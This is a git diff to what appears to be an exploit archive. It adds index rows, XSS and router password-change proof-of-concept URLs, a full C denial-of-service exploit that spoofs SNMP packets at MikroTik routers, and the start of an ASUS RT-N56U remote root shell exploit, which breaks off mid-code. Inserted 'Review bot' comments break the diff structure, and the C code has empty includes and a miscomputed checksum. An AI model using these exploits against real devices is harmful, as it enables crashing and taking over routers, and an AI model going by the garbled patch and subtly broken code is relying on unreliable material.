diff --git a/files.csv b/files.csv
index f8b91ca39..f96bcf99e 100755
--- a/files.csv
+++ b/files.csv
@@ -27711,6 +27711,7 @@ id,file,description,date,author,platform,type,port
 30874,platforms/php/webapps/30874.txt,"E-Xoops 1.0.5/1.0.8 modules/banners/click.php bid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0
 30875,platforms/php/webapps/30875.txt,"E-Xoops 1.0.5/1.0.8 modules/arcade/index.php gid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0
 30876,platforms/php/webapps/30876.txt,"Falcon Series One 1.4.3 stable Multiple Input Validation Vulnerabilities",2007-11-10,MhZ91,php,webapps,0
+30877,platforms/php/webapps/30877.txt,"Roundcube Webmail 0.1 CSS Expression Input Validation Vulnerability",2007-11-10,"Tomas Kuliavas",php,webapps,0
 30878,platforms/php/webapps/30878.txt,"Bitweaver 1.x/2.0 users/register.php URL XSS",2007-11-10,Doz,php,webapps,0
 30879,platforms/php/webapps/30879.txt,"Bitweaver 1.x/2.0 search/index.php URL XSS",2007-11-10,Doz,php,webapps,0
 30880,platforms/php/webapps/30880.txt,"Bitweaver 1.x/2.0 search/index.php highlight Parameter SQL Injection",2007-11-10,Doz,php,webapps,0
@@ -27727,6 +27728,7 @@ id,file,description,date,author,platform,type,port
 30891,platforms/php/webapps/30891.txt,"Flyspray 0.9.9 Multiple Cross-Site Scripting Vulnerabilities",2007-12-09,"KAWASHIMA Takahiro",php,webapps,0
 30892,platforms/php/webapps/30892.txt,"Neuron News 1.0 Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2007-12-17,"hadihadi & black.shadowes",php,webapps,0
 30893,platforms/php/webapps/30893.txt,"PHP Security Framework Multiple Input Validation Vulnerabilities",2007-12-17,DarkFig,php,webapps,0
+30894,platforms/linux/dos/30894.txt,"PeerCast 0.12 HandshakeHTTP Multiple Buffer Overflow Vulnerabilities",2007-12-17,"Luigi Auriemma",linux,dos,0
 30895,platforms/linux/remote/30895.pl,"Perl Net::DNS 0.48/0.59/0.60 DNS Response Remote Denial of Service Vulnerability",2007-12-17,beSTORM,linux,remote,0
 30896,platforms/multiple/dos/30896.txt,"Appian Business Process Management Suite 5.6 Remote Denial of Service Vulnerability",2007-12-17,"Chris Castaldo",multiple,dos,0
 30897,platforms/windows/remote/30897.html,"iMesh 7 'IMWebControl' ActiveX Control Code Execution Vulnerability",2007-12-17,rgod,windows,remote,0
@@ -27738,6 +27740,7 @@ id,file,description,date,author,platform,type,port
 30903,platforms/multiple/dos/30903.c,"id3lib ID3 Tags Buffer Overflow Vulnerability",2007-12-19,"Luigi Auriemma",multiple,dos,0
 30905,platforms/multiple/remote/30905.txt,"Adobe Flash Player 8.0.34.0/9.0.x main.swf baseurl Parameter asfunction: Protocol Handler XSS",2007-12-18,"Rich Cannings",multiple,remote,0
 30906,platforms/multiple/dos/30906.c,"ProWizard 4 PC 1.62 Multiple Remote Stack Based Buffer Overflow Vulnerabilities",2007-12-19,"Luigi Auriemma",multiple,dos,0
+30907,platforms/linux/remote/30907.txt,"Adobe Flash Player 7.0.x/8.0.x/9.0.x ActiveX Control 'navigateToURL' API Cross Domain Scripting Vulnerability",2007-12-18,"Adam Barth",linux,remote,0
 30908,platforms/windows/remote/30908.txt,"SoapUI 4.6.3 - Remote Code Execution",2014-01-14,"Barak Tawily",windows,remote,0
 30909,platforms/php/webapps/30909.html,"Auto Classifieds Script 2.0 - Add Admin CSRF Vulnerability",2014-01-14,"HackXBack ",php,webapps,80
 30910,platforms/php/webapps/30910.txt,"PHPJabbers Job Listing Script - Multiple Vulnerabilities",2014-01-14,"HackXBack ",php,webapps,80
@@ -27764,6 +27767,7 @@ id,file,description,date,author,platform,type,port
 30931,platforms/php/webapps/30931.txt,"Logaholic index.php conf Parameter XSS",2007-12-24,malibu.r,php,webapps,0
 30932,platforms/php/webapps/30932.txt,"Logaholic profiles.php newconfname Parameter XSS",2007-12-24,malibu.r,php,webapps,0
 30933,platforms/multiple/remote/30933.php,"Zoom Player 3.30/5/6 Crafted ZPL File Error Message Arbitrary Code Execution",2007-12-24,"Luigi Auriemma",multiple,remote,0
+30934,platforms/windows/dos/30934.txt,"Total Player 3.0 M3U File Denial of Service Vulnerability",2007-12-25,"David G.M.",windows,dos,0
 30935,platforms/hardware/remote/30935.txt,"ZyXEL P-330W Multiple Vulnerabilities",2007-12-25,santa_clause,hardware,remote,0
 30936,platforms/windows/dos/30936.html,"AOL Picture Editor 'YGPPicEdit.dll' ActiveX Control 9.5.1.8 Multiple Buffer Overflow Vulnerabilities",2007-12-25,"Elazar Broad",windows,dos,0
 30937,platforms/php/webapps/30937.txt,"Limbo CMS 1.0.4 'com_option' Parameter Cross-Site Scripting Vulnerability",2007-12-25,"Omer Singer",php,webapps,0
@@ -27772,6 +27776,8 @@ id,file,description,date,author,platform,type,port
 30940,platforms/asp/webapps/30940.txt,"IPortalX forum/login_user.asp Multiple Parameter XSS",2007-12-27,Doz,asp,webapps,0
 30941,platforms/asp/webapps/30941.txt,"IPortalX blogs.asp Date Parameter XSS",2007-12-27,Doz,asp,webapps,0
 30942,platforms/linux/dos/30942.c,"Extended Module Player (xmp) 2.5.1 'oxm.c' And 'dtt_load.c' Multiple Local Buffer Overflow Vulnerabilities",2007-12-27,"Luigi Auriemma",linux,dos,0
+30943,platforms/multiple/dos/30943.txt,"Libnemesi 0.6.4-rc1 Multiple Remote Buffer Overflow Vulnerabilities",2007-12-27,"Luigi Auriemma",multiple,dos,0
+30944,platforms/multiple/remote/30944.txt,"Feng 0.1.15 Multiple Remote Buffer Overflow and Denial of Service Vulnerabilities",2007-12-27,"Luigi Auriemma",multiple,remote,0
 30945,platforms/php/webapps/30945.txt,"NetBizCity FaqMasterFlexPlus 'faq.php' Cross-Site Scripting Vulnerability",2007-12-28,"Juan Galiana Lara",php,webapps,0
 30946,platforms/php/webapps/30946.txt,"Collabtive 1.1 (managetimetracker.php, id param) - SQL Injection",2014-01-15,"Yogesh Phadtare",php,webapps,80
 30947,platforms/php/webapps/30947.txt,"NetBizCity FaqMasterFlexPlus 'faq.php' SQL Injection Vulnerability",2007-12-28,"Juan Galiana Lara",php,webapps,0
@@ -27797,6 +27803,8 @@ id,file,description,date,author,platform,type,port
 30967,platforms/php/webapps/30967.txt,"LiveCart 1.0.1 user/remindComplete email Parameter XSS",2007-12-31,Doz,php,webapps,0
 30968,platforms/php/webapps/30968.txt,"MODx 0.9.6.1 'htcmime.php' Source Code Information Disclosure Vulnerability",2008-01-02,"AmnPardaz Security Research Team",php,webapps,0
 30969,platforms/php/webapps/30969.txt,"MODx 0.9.6.1 'AjaxSearch.php' Local File Include Vulnerability",2008-01-02,"AmnPardaz Security Research Team",php,webapps,0
+30970,platforms/multiple/local/30970.txt,"White_Dune 0.29beta791 Multiple Local Code Execution Vulnerabilities",2008-01-02,"Luigi Auriemma",multiple,local,0
+30971,platforms/linux/remote/30971.txt,"Georgia SoftWorks Secure Shell Server 7.1.3 Multiple Remote Code Execution Vulnerabilities",2007-01-02,"Luigi Auriemma",linux,remote,0
 30972,platforms/multiple/remote/30972.txt,"Camtasia Studio 4.0.2 'csPreloader' Remote Code Execution Vulnerability",2008-01-02,"Rich Cannings",multiple,remote,0
 30973,platforms/multiple/remote/30973.txt,"InfoSoft FusionCharts 3 SWF Flash File Remote Code Execution Vulnerability",2008-01-02,"Rich Cannings",multiple,remote,0
 30975,platforms/cgi/webapps/30975.txt,"W3-mSQL Error Page Cross-Site Scripting Vulnerability",2008-01-03,vivek_infosec,cgi,webapps,0
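Review bot: The added row for 30971 is dated `2007-01-02`, while the row added just before it (30970) and every surrounding entry carry 2008-01-02, so the year looks like a typo; please confirm against the advisory and, if so, change it to `2008-01-02`. The row for 30907 added in the third hunk files an 'ActiveX Control' issue under platform `linux`, which is also worth a second look, though it may be intentional if the advisory covers a cross-platform Flash Player issue. The index is what the archive's searches key on, so these fields are cheapest to get right at insertion time.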
@@ -27812,6 +27820,9 @@ id,file,description,date,author,platform,type,port
 30985,platforms/linux/dos/30985.txt,"'libcdio' 0.7x GNU Compact Disc Input and Control Library Buffer Overflow Vulnerabilities",2007-12-30,"Devon Miller",linux,dos,0
 30987,platforms/php/webapps/30987.txt,"netRisk 1.9.7 'index.php' Remote File Include Vulnerability",2008-01-04,S.W.A.T.,php,webapps,0
 30988,platforms/php/webapps/30988.txt,"Rotabanner Local 2/3 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0
+30989,platforms/multiple/dos/30989.txt,"Pragma Systems FortressSSH 5.0 'msvcrt.dll' Exception Handling Remote Denial Of Service Vulnerability",2008-01-04,"Luigi Auriemma",multiple,dos,0
+30990,platforms/multiple/dos/30990.txt,"Foxit WAC Server 2.0 Build 3503 Denial of Service Vulnerability",2008-01-04,"Luigi Auriemma",multiple,dos,0
+30991,platforms/multiple/dos/30991.txt,"Pragma TelnetServer 7.0.4.589 NULL-Pointer Dereference Denial of Service Vulnerability",2008-01-04,"Luigi Auriemma",multiple,dos,0
 30992,platforms/php/webapps/30992.txt,"Strawberry 1.1.1 'html.php' Remote Code Execution Vulnerability",2008-01-07,"Eugene Minaev",php,webapps,0
 30993,platforms/asp/webapps/30993.txt,"Snitz Forums 2000 3.4.5/3.4.6 Multiple Cross-Site Scripting Vulnerabilities",2008-01-07,Doz,asp,webapps,0
 30994,platforms/php/webapps/30994.html,"eTicket 1.5.5.2 admin.php CSRF",2008-01-07,L4teral,php,webapps,0
@@ -27819,6 +27830,7 @@ id,file,description,date,author,platform,type,port
 30996,platforms/php/webapps/30996.txt,"eTicket 1.5.5.2 search.php Multiple Parameter SQL Injection",2008-01-07,L4teral,php,webapps,0
 30997,platforms/php/webapps/30997.txt,"eTicket 1.5.5.2 admin.php Multiple Parameter SQL Injection",2008-01-07,L4teral,php,webapps,0
 30998,platforms/linux/remote/30998.py,"SynCE 0.92 'vdccm' Daemon Remote Command Injection Vulnerability",2008-01-07,"Alfredo Ortega",linux,remote,0
+30999,platforms/windows/local/30999.txt,"Creative Ensoniq PCI ES1371 WDM Driver 5.1.3612 Local Privilege Escalation Vulnerability",2008-01-07,"Ruben Santamarta ",windows,local,0
 31000,platforms/php/webapps/31000.txt,"SysHotel On Line System 'index.php' Local File Include Vulnerability",2008-01-08,p4imi0,php,webapps,0
 31001,platforms/php/webapps/31001.txt,"IceWarp Mail Server 9.1.1 'admin/index.html' Cross-Site Scripting Vulnerability",2008-01-08,Ekin0x,php,webapps,0
 31002,platforms/linux/dos/31002.txt,"xine-lib <= 1.1.9 'rmff_dump_cont()' Remote Heap Buffer Overflow Vulnerability",2008-01-09,"Luigi Auriemma",linux,dos,0
@@ -27835,6 +27847,7 @@ id,file,description,date,author,platform,type,port
 31014,platforms/windows/dos/31014.py,"haneWIN DNS Server 1.5.3 - Denial of Service",2014-01-17,sajith,windows,dos,53
 31015,platforms/php/webapps/31015.txt,"bloofox CMS 0.5.0 - Multiple Vulnerabilities",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,80
 31017,platforms/asp/webapps/31017.php,"SmarterMail Enterprise and Standard <=11.x - Stored XSS",2014-01-17,"Saeed reza Zamanian",asp,webapps,80
+31018,platforms/linux/dos/31018.txt,"GStreamer 0.10.15 Multiple Unspecified Remote Denial of Service Vulnerabilities",2008-01-11,"Sam Hocevar",linux,dos,0
 31020,platforms/php/webapps/31020.txt,"Moodle <= 1.8.3 'install.php' Cross Site Scripting Vulnerability",2008-01-12,"Hanno Bock",php,webapps,0
 31021,platforms/osx/dos/31021.html,"Apple Safari <= 2.0.4 KHTML WebKit Remote Denial of Service Vulnerability",2008-01-12,"David Barroso",osx,dos,0
 31022,platforms/php/webapps/31022.txt,"PHP Running Management 1.0.2 'index.php' Cross Site Scripting Vulnerability",2008-01-13,"Christophe VG",php,webapps,0
@@ -27847,6 +27860,8 @@ id,file,description,date,author,platform,type,port
 31029,platforms/php/webapps/31029.pl,"Peter's Math Anti-Spam for WordPress 0.1.6 Plugin Audio CAPTCHA Security Bypass Vulnerability",2008-01-15,Romero,php,webapps,0
 31030,platforms/php/webapps/31030.pl,"SpamBam WordPress Plugin Key Calculation Security Bypass Vulnerability",2007-01-15,Romero,php,webapps,0
 31031,platforms/hardware/remote/31031.txt,"8E6 R3000 Internet Filter 2.0.5.33 URI Security Bypass Vulnerability",2008-01-16,nnposter,hardware,remote,0
+31032,platforms/windows/remote/31032.txt,"BitTorrent 6.0 and uTorrent 1.6/1.7 Peers Window Remote Code Execution Vulnerability",2008-01-16,"Luigi Auriemma",windows,remote,0
+31033,platforms/hardware/webapps/31033.py,"ASUS RT-N56U - Remote Root Shell Buffer Overflow (ROP)",2014-01-19,"Jacob Holcomb",hardware,webapps,80
 31034,platforms/php/webapps/31034.txt,"MyBB <= 1.2.10 'moderation.php' Multiple SQL Injection Vulnerabilities",2008-01-16,waraxe,php,webapps,0
 31035,platforms/php/webapps/31035.txt,"Clever Copy 3.0 Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2008-01-17,hadihadi,php,webapps,0
 31036,platforms/windows/local/31036.txt,"CORE FORCE Firewall 0.95.167 and Registry Modules Multiple Local Kernel Buffer Overflow Vulnerabilities",2008-01-17,"Sebastian Gottschalk",windows,local,0
@@ -27886,3 +27901,34 @@ id,file,description,date,author,platform,type,port
 31071,platforms/cgi/webapps/31071.txt,"VB Marketing 'tseekdir.cgi' Local File Include Vulnerability",2008-01-28,"Sw33t h4cK3r",cgi,webapps,0
 31072,platforms/windows/remote/31072.html,"Symantec Backup Exec System Recovery Manager 7.0 FileUpload Class Unauthorized File Upload Vulnerability",2007-01-05,titon,windows,remote,0
 31073,platforms/java/webapps/31073.html,"SunGard Banner Student 7.3 'add1' Parameter Cross-Site Scripting Vulnerability",2008-01-29,"Brendan M. Hickey",java,webapps,0
+31074,platforms/php/webapps/31074.txt,"Nucleus CMS <= 3.22 'action.php' Cross-Site Scripting Vulnerability",2008-01-20,"Alexandr Polyakov",php,webapps,0
+31075,platforms/php/webapps/31075.txt,"AmpJuke 0.7 'index.php' Cross-Site Scripting Vulnerability",2008-01-29,ShaFuck31,php,webapps,0
+31076,platforms/linux/remote/31076.py,"MPlayer 1.0rc2 'demux_mov.c' Remote Code Execution Vulnerability",2008-02-04,"Felipe Manzano",linux,remote,0
+31077,platforms/php/webapps/31077.txt,"Mambo/Joomla 'com_buslicense' Component 'aid' Parameter SQL Injection Vulnerability",2008-01-30,S@BUN,php,webapps,0
+31078,platforms/hardware/remote/31078.txt,"2Wire Routers 'H04_POST' Access Validation Vulnerability",2008-01-30,"Oligarchy Oligarchy",hardware,remote,0
+31079,platforms/php/webapps/31079.txt,"webSPELL 4.1.2 'whoisonline.php' Cross-Site Scripting Vulnerability",2008-01-30,NBBN,php,webapps,0
+31080,platforms/php/webapps/31080.txt,"YeSiL KoRiDoR Ziyaretçi Defteri 'index.php' SQL Injection Vulnerability",2008-01-30,ShaFuck31,php,webapps,0
+31081,platforms/cgi/webapps/31081.txt,"OpenBSD 4.1 bgplg 'cmd' Parameter Cross-Site Scripting Vulnerability",2007-10-10,"Anton Karpov",cgi,webapps,0
+31082,platforms/php/webapps/31082.txt,"Liferay Enterprise Portal 4.3.6 User-Agent HTTP Header Cross Site Scripting Vulnerability",2008-01-31,"Tomasz Kuczynski",php,webapps,0
+31083,platforms/php/webapps/31083.txt,"Nilson's Blogger 0.11 'comments.php' Local File Include Vulnerability",2008-01-31,muuratsalo,php,webapps,0
+31084,platforms/php/webapps/31084.txt,"Archimede Net 2000 'E-Guest_show.php' SQL Injection Vulnerability",2008-02-01,"Sw33t h4cK3r",php,webapps,0
+31085,platforms/php/webapps/31085.txt,"Doodle4Gift - Multiple Vulnerabilities",2014-01-20,Dr.NaNo,php,webapps,80
+31086,platforms/php/webapps/31086.php,"AfterLogic Pro and Lite 7.1.1.1 - Stored XSS",2014-01-20,"Saeed reza Zamanian",php,webapps,80
+31087,platforms/hardware/webapps/31087.txt,"Teracom Modem T2-B-Gawv1.4U10Y-BI - Stored XSS Vulnerability",2014-01-20,"Rakesh S",hardware,webapps,80
+31088,platforms/hardware/webapps/31088.py,"BLUE COM Router 5360/52018 - Password Reset Exploit",2014-01-20,KAI,hardware,webapps,80
+31090,platforms/windows/local/31090.txt,"MuPDF 1.3 - Stack-based Buffer Overflow in xps_parse_color()",2014-01-20,"Jean-Jamil Khalife",windows,local,0
+31091,platforms/php/webapps/31091.txt,"Domain Trader 2.0 'catalog.php' Cross-Site Scripting Vulnerability",2008-02-02,Crackers_Child,php,webapps,0
+31092,platforms/php/webapps/31092.txt,"WP-Footnotes 2.2 WordPress Plugin Multiple Remote Vulnerabilities",2008-02-02,NBBN,php,webapps,0
+31093,platforms/php/webapps/31093.txt,"ITechClassifieds ViewCat.php CatID Parameter SQL Injection",2008-02-02,Crackers_Child,php,webapps,0
+31094,platforms/php/webapps/31094.txt,"ITechClassifieds ViewCat.php CatID Parameter XSS",2008-02-02,Crackers_Child,php,webapps,0
+31095,platforms/novell/remote/31095.txt,"Novell GroupWise 5.57e/6.5.7/7.0 WebAccess Multiple Cross Site Scripting Vulnerabilities",2008-01-31,"Frederic Loudet",novell,remote,0
+31096,platforms/php/webapps/31096.txt,"WordPress Plugin ShiftThis Newsletter SQL Injection Vulnerability",2008-02-03,S@BUN,php,webapps,0
+31097,platforms/php/webapps/31097.txt,"CruxCMS 3.0 'search.php' Cross-Site Scripting Vulnerability",2008-02-04,Psiczn,php,webapps,0
+31098,platforms/php/webapps/31098.txt,"Simple OS CMS 0.1c_beta 'login.php' SQL Injection Vulnerability",2008-02-04,Psiczn,php,webapps,0
+31099,platforms/php/webapps/31099.txt,"Codice CMS 'login.php' SQL Injection Vulnerability",2008-02-04,Psiczn,php,webapps,0
+31100,platforms/multiple/dos/31100.txt,"Anon Proxy Server 0.100/0.102 Remote Authentication Buffer Overflow Vulnerability",2008-02-04,L4teral,multiple,dos,0
+31101,platforms/php/webapps/31101.txt,"HispaH Youtube Clone 'load_message.php' Cross-Site Scripting Vulnerability",2008-02-04,Smasher,php,webapps,0
+31102,platforms/hardware/dos/31102.c,"MikroTik RouterOS 3.0 SNMP SET Denial of Service Vulnerability",2008-02-04,ShadOS,hardware,dos,0
+31103,platforms/asp/webapps/31103.txt,"AstroSoft HelpDesk operator/article/article_search_results.asp txtSearch Parameter XSS",2008-02-04,"Alexandr Polyakov",asp,webapps,0
+31104,platforms/asp/webapps/31104.txt,"AstroSoft HelpDesk operator/article/article_attachment.asp Attach_Id Parameter XSS",2008-02-04,"Alexandr Polyakov",asp,webapps,0
+31105,platforms/windows/dos/31105.py,"Titan FTP Server 6.05 build 550 DELE Command Remote Buffer Overflow Vulnerability",2008-02-04,j0rgan,windows,dos,0
diff --git a/platforms/asp/webapps/31103.txt b/platforms/asp/webapps/31103.txt
new file mode 100755
index 000000000..37d249e47
--- /dev/null
+++ b/platforms/asp/webapps/31103.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27610/info
+
+AstroSoft HelpDesk is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/[installdir]/operator/article/article_search_results.asp?txtSearch=">"
\ No newline at end of file
diff --git a/platforms/asp/webapps/31104.txt b/platforms/asp/webapps/31104.txt
new file mode 100755
index 000000000..16dd69a1a
--- /dev/null
+++ b/platforms/asp/webapps/31104.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27610/info
+
+AstroSoft HelpDesk is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/[installdir]/operator/article/article_attachment.asp?Attach_Id="
\ No newline at end of file
diff --git a/platforms/cgi/webapps/31081.txt b/platforms/cgi/webapps/31081.txt
new file mode 100755
index 000000000..bcdfc5242
--- /dev/null
+++ b/platforms/cgi/webapps/31081.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27535/info
+
+OpenBSD bgplg is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+bgplg shipped with OpenBSD 4.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/cgi-bin/bgplg?cmd=show+version
\ No newline at end of file
diff --git a/platforms/hardware/dos/31102.c b/platforms/hardware/dos/31102.c
new file mode 100755
index 000000000..0856a5484
--- /dev/null
+++ b/platforms/hardware/dos/31102.c
@@ -0,0 +1,204 @@
+source: http://www.securityfocus.com/bid/27599/info
+
+MikroTik RouterOS is prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash an affected router, denying service to legitimate users.
+
+This issue affects versions up to and including RouterOS 3.2.
+
+/* --------------------------------------------------------------------------
+* (c) ShadOS 2008
+* _ _ _ _ _ __ _ _ _
+* | || |___| | | |/ /_ _ (_)__ _| |_| |_ ___
+* | __ / -_) | | ' <| ' \| / _` | ' \ _(_-<
+* |_||_\___|_|_|_|\_\_||_|_\__, |_||_\__/__/
+* hellknights.void.ru |___/ .0x48k.
+*
+* --------------------------------------------------------------------------
+*
+* MicroTik RouterOS <=3.2 SNMPd snmp-set DoS exploit. Other OSs may be vulnurable (fe. Linux )
+* Don't forget to visit our site and my homepage for new releases:
+* http://hellknights.void.ru
+* http://shados.freeweb7.com
+* Also, you can mail me any bugs or suggestions:
+* mailto: shados /at/ mail /dot/ ru
+*
+* Thanks 2 antichat.ru and all my friends.
+* --------------------------------------------------------------------------
+*
+* Copyright (C) 89, 90, 91, 1995-2007 Free Software Foundation.
+*
+* This program is free software; you can redistribute it and/or modify
+* it under the terms of the GNU General Public License as published by
+* the Free Software Foundation; either version 2, or (at your option)
+* any later version.
+*
+* This program is distributed in the hope that it will be useful,
+* but WITHOUT ANY WARRANTY; without even the implied warranty of
+* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+* GNU General Public License for more details.
+*
+* You should have received a copy of the GNU General Public License
+* along with this program; if not, write to the Free Software Foundation,
+* Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
+*
+* --------------------------------------------------------------------------
+*/
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+char evilcode[] = {
+0x19, 0x02, 0x02, 0x1e, 0x0c, 0x02, 0x01, 0x00, 0x02, 0x01, 0x00, 0x30, 0x0d, 0x30, 0x0b, 0x06, 0x07, 0x01, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x05, 0x00, 0x00
+};
+
+
+unsigned short in_cksum(addr, len)
+u_short *addr;
+int len;
+{
+ register int nleft = len;
+ register u_short *w = addr;
+ register int sum = 0;
+ u_short answer = 0;
+
+ while (nleft > 1) {
+ sum += *w++;
+ sum += *w++;
+ nleft -= 2;
+ }
+ if (nleft == 1) {
+ *(u_char *) (&answer) = *(u_char *) w;
+ sum += answer;
+ }
+ sum = (sum >> 17) + (sum & 0xffff);
+ sum += (sum >> 17);
+ answer = -sum;
+ return (answer);
+}
+
+int sendudp(int sock,unsigned long *saddr, unsigned long *daddr,unsigned int sport,unsigned int dport,char *data, int len)
+{
+ char *packet;
+ struct sockaddr_in dstaddr;
+ struct iphdr *ip;
+ struct udphdr *udp;
+ packet = (char *)malloc(sizeof(struct iphdr)+sizeof(struct udphdr)+len);
+ memset(packet,0,sizeof(struct iphdr) + sizeof(struct udphdr) + len);
+ if (packet == NULL) { perror("Malloc failed\n"); exit(-1); }
+ ip = (struct iphdr *)packet;
+ udp = (struct udphdr *)(packet+sizeof(struct iphdr));
+ ip->saddr = *saddr;
+ ip->daddr = *daddr;
+ ip->version = 4;
+ ip->ihl = 5;
+ ip->ttl = 255;
+ ip->id = htons((unsigned short) rand());
+ ip->protocol = IPPROTO_UDP;
+ ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr)+len);
+ ip->check = in_cksum(ip, sizeof(struct iphdr));
+ udp->source = htons(sport);
+ udp->dest = htons(dport);
+ udp->len = htons(sizeof(struct udphdr) + len);
+ memcpy(packet+(sizeof(struct iphdr) + sizeof(struct udphdr)),data,len);
+ dstaddr.sin_family = AF_INET;
+ dstaddr.sin_addr.s_addr = *daddr;
+ if (sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct udphdr)+len,0,(struct sockaddr *)&dstaddr,sizeof(struct sockaddr_in)) < 0)
+ perror("sendto() failed");
+ free(packet);
+}
+
+char * makereq(char *community,int *size)
+{
+ char *buf;
+ char *ptr;
+ int len;
+ int i;
+
+ len = 5 + strlen(community) + sizeof(evilcode);
+ buf = (char *)malloc(len);
+ ptr = buf;
+
+ *ptr++ = 0x30;
+ *ptr++ = len;
+
+ /* Snmp Version */
+ *ptr++ = 0x02;
+ *ptr++ = 0x01;
+ *ptr++ = 0x00;
+
+ /* Community */
+ *ptr++ = 0x04;
+ *ptr++ = strlen(community);
+ strcpy(ptr,community);
+ ptr = ptr + strlen(community);
+
+
+ *ptr++ = 0xa3; /* Set Request */
+
+ memcpy(ptr, evilcode, sizeof(evilcode));
+ ptr = ptr + sizeof(evilcode);
+
+ *size = len+2;
+ return buf;
+}
+
+int erexit(char *msg)
+{
+ printf("%s\n",msg);
+ exit (-1) ;
+}
+
+int usage()
+{
+ printf("Usage: ./snmpdos <-s source> <-d dest> <-c community>\n");
+}
+
+int main(int argc, char **argv)
+{
+ char *saddr,*daddr,*community;
+ unsigned char *buf;
+ int size;
+ int sock;
+ unsigned long lsaddr,ldaddr;
+ int i;
+
+ saddr = NULL;
+ daddr = NULL;
+ if (argc != 7) { usage(); erexit("not enough args\n"); }
+
+ if (!strcmp(argv[1],"-s"))
+ saddr = strdup(argv[2]);
+ if (!strcmp(argv[3],"-d"))
+ daddr = strdup(argv[4]);
+ if (!strcmp(argv[5],"-c"))
+ community = strdup(argv[6]);
+
+ printf("Ok, spoofing packets from %s to %s\n",saddr,daddr);
+
+ if (inet_addr(saddr) == -1 || inet_addr(daddr) == -1)
+ erexit("Invalid source/destination IP address\n");
+
+ if (saddr == NULL) { usage(); erexit("No Source Address"); }
+ if (daddr == NULL) { usage(); erexit("No Dest Address"); }
+
+ sock = socket(AF_INET,SOCK_RAW,IPPROTO_RAW);
+ if (sock == -1)
+ erexit("Couldnt open Raw socket!(Are you root?)\n");
+
+ lsaddr = inet_addr(saddr);
+ ldaddr = inet_addr(daddr);
+
+ buf = makereq(community,&size);
+
+ sendudp(sock,&lsaddr,&ldaddr,32788,161,buf,size);
+ fprintf(stdout,"Sent packet. SNMPd must be down.\n");
+ return 0;
+
+}
diff --git a/platforms/hardware/remote/31078.txt b/platforms/hardware/remote/31078.txt
new file mode 100755
index 000000000..a8405783f
--- /dev/null
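Review bot: In `sendudp`, `memset(packet,0,...)` writes through the allocation on the line before `if (packet == NULL)` tests it, so the NULL check can never do its job; move the check directly after the `malloc`. `sendudp` and `usage` are declared `int` but fall off the end without a `return`, and `in_cksum` adds `*w++` twice per iteration while only decrementing `nleft` by 2, so it reads beyond the `len` bytes it is handed — all three are undefined behaviour that `-Wall -Wextra` would report. `makereq` likewise never checks its `malloc` result before writing through `ptr`.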
+++ b/platforms/hardware/remote/31078.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/27516/info
+
+Multiple 2Wire routers are prone to an access-validation vulnerability because they fail to adequately authenticate users before performing certain actions.
+
+Unauthenticated attackers can leverage this issue to change the password of arbitrary user accounts on the router. Successful attacks will completely compromise affected devices.
+
+2Wire routers that have the 'H04_POST' page are affected by this issue.
+
+UPDATE: This BID has been retired because it has been found to be a duplicate of BID 27246 (2Wire Routers Cross-Site Request Forgery Vulnerability).
+
+UPDATE (February 1, 2008): This BID is being reinstated. Further investigation and new information reveal that this vulnerability differs from the one described in BID 27246.
+
+http://www.example.com/xslt?PAGE=H04_POST&PASSWORD=admin&PASSWORD_CONF=admin
\ No newline at end of file
diff --git a/platforms/hardware/webapps/31033.py b/platforms/hardware/webapps/31033.py
new file mode 100755
index 000000000..77fe18ab2
--- /dev/null
+++ b/platforms/hardware/webapps/31033.py
@@ -0,0 +1,256 @@ +#!/usr/bin/env python + +from time import sleep +from sys import exit +import urllib2, signal, struct, base64, socket, ssl + +# [*] Title: ASUS RT-N56U Remote Root Shell Exploit - apps_name +# [*] Discovered and Reported: October 2013 +# [*] Discovered/Exploited By: Jacob Holcomb/Gimppy - Security Analyst @ ISE +# [*] Contact: Twitter - @rootHak42 +# [*] Software Vendor: http://asus.com +# [*] Exploit/Advisory: http://securityevaluators.com, http://infosec42.blogspot.com/ +# [*] Software: httpd (Listens on TCP/80 and TCP/443) +# [*] Tested Firmware Versions: 3.0.0.4.374_979 (Other versions may be vulnerable) +# [*] CVE: ASUS RT-N56U Buffer Overflow: CVE-2013-6343 +# +# [*] Overview: +# Multiple ASUS routers including the RT-N56U and RT-AC66U have the ability to install +# supplemental applications. This install process is handled by the routers web server, +# and is susceptible to multiple Buffer Overflow attacks. +# +# Vulnerable Web Page: APP_Installation.asp +# Vulnerable HTML Parameters: apps_name, apps_flag +# Vulneralbe Source File: web.c of httpd code +# *Firmware versions prior to the tested version were vulnerable to this attack. +# + + +def fingerPrint(host, port, netSock): + + fprint = ["RT-N56U"] + found = None + print " [*] Preparing to fingerprint the server." + try: + print " [*] Connecting to %s on port %d." % (host, port) + netSock.connect((host, port)) + except Exception as 